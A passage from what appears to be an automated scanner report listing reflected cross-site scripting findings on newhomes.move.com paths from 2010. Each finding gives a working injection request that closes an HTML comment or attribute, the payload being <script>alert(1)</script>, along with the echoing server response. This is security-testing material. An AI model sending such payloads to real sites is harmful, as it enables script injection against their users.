Set-Cookie: ASP.NET_SessionId=4yy01rfbldji5ha32sp5kfjn; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:50 GMT; path=/
Set-Cookie: Personal8549=market=100&state=IL&searchtext=elgin; expires=Mon, 19-Dec-2011 18:22:50 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 217609


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
gin/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/LoginModal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?94e94"><script>alert(1)</script>d77209e2310=1','/comcast/comcast/LoginModal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?94e94">
...[SNIP]...

2.64. http://newhomes.move.com/comcast/communityresults/market-100/city-elgin [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-100/city-elgin

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 98ac7--><script>alert(1)</script>ac0c2d01358 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /comcast/communityresults/market-100/city-elgin?98ac7--><script>alert(1)</script>ac0c2d01358=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:57 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=gbod1pi2b0cgqd455h5gppiy; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:57 GMT; path=/
Set-Cookie: Personal8549=market=100&state=IL&searchtext=elgin; expires=Mon, 19-Dec-2011 18:22:57 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 216643


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
ast/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/loginmodal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?98ac7--><script>alert(1)</script>ac0c2d01358=1','/comcast/comcast/loginmodal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?98ac7-->
...[SNIP]...

2.65. http://newhomes.move.com/comcast/communityresults/market-112 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-112

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 6873e--><script>alert(1)</script>4919b76ff04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /comcast/communityresults/market-112?6873e--><script>alert(1)</script>4919b76ff04=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:52 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=nnyk2umyfj14ar45xxcru245; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:52 GMT; path=/
Set-Cookie: Personal8549=market=112&state=IN; expires=Mon, 19-Dec-2011 18:22:52 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 192747


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
ast/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/loginmodal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?6873e--><script>alert(1)</script>4919b76ff04=1','/comcast/comcast/loginmodal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?6873e-->
...[SNIP]...

2.66. http://newhomes.move.com/comcast/communityresults/market-112 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-112

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfb31"><script>alert(1)</script>b122dc6b5fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /comcast/communityresults/market-112?dfb31"><script>alert(1)</script>b122dc6b5fa=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:43 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=cgckrd45hjb4rdupds3tuc45; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:43 GMT; path=/
Set-Cookie: Personal8549=market=112&state=IN; expires=Mon, 19-Dec-2011 18:22:43 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 181242


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
gin/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/LoginModal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?dfb31"><script>alert(1)</script>b122dc6b5fa=1','/comcast/comcast/LoginModal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?dfb31">
...[SNIP]...

2.67. http://newhomes.move.com/comcast/communityresults/market-174 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-174

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 634c0--><script>alert(1)</script>24754516b9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /comcast/communityresults/market-174?634c0--><script>alert(1)</script>24754516b9a=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:50 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=z2q4km45qwznqi55l2zmrg45; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:50 GMT; path=/
Set-Cookie: Personal8549=market=174&state=NC; expires=Mon, 19-Dec-2011 18:22:50 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 176743


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
ast/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/loginmodal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?634c0--><script>alert(1)</script>24754516b9a=1','/comcast/comcast/loginmodal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?634c0-->
...[SNIP]...

2.68. http://newhomes.move.com/comcast/communityresults/market-174 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-174

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4b60"><script>alert(1)</script>efb2d8e3b8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /comcast/communityresults/market-174?a4b60"><script>alert(1)</script>efb2d8e3b8d=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:42 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=wgsjt3yc1ozc3l45idb1cv45; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:42 GMT; path=/
Set-Cookie: Personal8549=market=174&state=NC; expires=Mon, 19-Dec-2011 18:22:42 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 176755


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
gin/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/LoginModal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?a4b60"><script>alert(1)</script>efb2d8e3b8d=1','/comcast/comcast/LoginModal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?a4b60">
...[SNIP]...

2.69. http://newhomes.move.com/comcast/communityresults/market-174/city-fort+mill [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-174/city-fort+mill

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42dbc"><script>alert(1)</script>82ed0c235b1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /comcast/communityresults/market-174/city-fort+mill?42dbc"><script>alert(1)</script>82ed0c235b1=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:47 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=gba5g455itkjwa45tfjs3kq2; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:47 GMT; path=/
Set-Cookie: Personal8549=market=174&state=SC&searchtext=fort mill; expires=Mon, 19-Dec-2011 18:22:47 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 173715


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
gin/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/LoginModal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?42dbc"><script>alert(1)</script>82ed0c235b1=1','/comcast/comcast/LoginModal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?42dbc">
...[SNIP]...

2.70. http://newhomes.move.com/comcast/communityresults/market-174/city-fort+mill [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-174/city-fort+mill

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 46d92--><script>alert(1)</script>7f5af089e29 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /comcast/communityresults/market-174/city-fort+mill?46d92--><script>alert(1)</script>7f5af089e29=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:55 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=zrrw3qjk3wkfv455acwb3k45; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:55 GMT; path=/
Set-Cookie: Personal8549=market=174&state=SC&searchtext=fort mill; expires=Mon, 19-Dec-2011 18:22:55 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 174222


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
ast/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/loginmodal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?46d92--><script>alert(1)</script>7f5af089e29=1','/comcast/comcast/loginmodal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?46d92-->
...[SNIP]...

2.71. http://newhomes.move.com/comcast/communityresults/market-177 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-177

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 506e9--><script>alert(1)</script>d887f385758 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /comcast/communityresults/market-177?506e9--><script>alert(1)</script>d887f385758=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:49 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=aqw2da3giqdu4knfvqjgln55; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:49 GMT; path=/
Set-Cookie: Personal8549=market=177&state=NC; expires=Mon, 19-Dec-2011 18:22:49 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 147842


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
ast/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/loginmodal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?506e9--><script>alert(1)</script>d887f385758=1','/comcast/comcast/loginmodal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?506e9-->
...[SNIP]...

2.72. http://newhomes.move.com/comcast/communityresults/market-177 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-177

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2032"><script>alert(1)</script>4cf364eea8b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /comcast/communityresults/market-177?c2032"><script>alert(1)</script>4cf364eea8b=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:43 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=xywlpfzqpzpxn4rgc4bivgix; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:43 GMT; path=/
Set-Cookie: Personal8549=market=177&state=NC; expires=Mon, 19-Dec-2011 18:22:43 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 147774


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
gin/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/LoginModal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?c2032"><script>alert(1)</script>4cf364eea8b=1','/comcast/comcast/LoginModal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?c2032">
...[SNIP]...

2.73. http://newhomes.move.com/comcast/communityresults/market-18 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-18

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9751"><script>alert(1)</script>db94b3e8444 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /comcast/communityresults/market-18?f9751"><script>alert(1)</script>db94b3e8444=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:43 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=4ydqttqmnj0uxkqz2fe5ntmn; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:43 GMT; path=/
Set-Cookie: Personal8549=market=18&state=AZ; expires=Mon, 19-Dec-2011 18:22:43 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 197988


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
gin/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/LoginModal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?f9751"><script>alert(1)</script>db94b3e8444=1','/comcast/comcast/LoginModal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?f9751">
...[SNIP]...

2.74. http://newhomes.move.com/comcast/communityresults/market-18 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-18

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 162ed--><script>alert(1)</script>28afb1b29a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /comcast/communityresults/market-18?162ed--><script>alert(1)</script>28afb1b29a8=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:49 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=2rs5k355bbeyy2fwhwvrbx55; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:49 GMT; path=/
Set-Cookie: Personal8549=market=18&state=AZ; expires=Mon, 19-Dec-2011 18:22:49 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 198065


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
ast/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/loginmodal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?162ed--><script>alert(1)</script>28afb1b29a8=1','/comcast/comcast/loginmodal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?162ed-->
...[SNIP]...

2.75. http://newhomes.move.com/comcast/communityresults/market-18/city-avondale [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-18/city-avondale

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac969"><script>alert(1)</script>b554311ff46 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /comcast/communityresults/market-18/city-avondale?ac969"><script>alert(1)</script>b554311ff46=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:49 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=qqgt2hmru4a2kw45q3siahby; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:49 GMT; path=/
Set-Cookie: Personal8549=market=18&state=AZ&searchtext=avondale; expires=Mon, 19-Dec-2011 18:22:49 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 187815


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
gin/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/LoginModal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?ac969"><script>alert(1)</script>b554311ff46=1','/comcast/comcast/LoginModal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?ac969">
...[SNIP]...

2.76. http://newhomes.move.com/comcast/communityresults/market-18/city-avondale [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-18/city-avondale

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload e7457--><script>alert(1)</script>71771dcee16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /comcast/communityresults/market-18/city-avondale?e7457--><script>alert(1)</script>71771dcee16=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:56 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=s4pk0ly3pd5wvmf2su0cqk45; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:56 GMT; path=/
Set-Cookie: Personal8549=market=18&state=AZ&searchtext=avondale; expires=Mon, 19-Dec-2011 18:22:56 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 176508


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


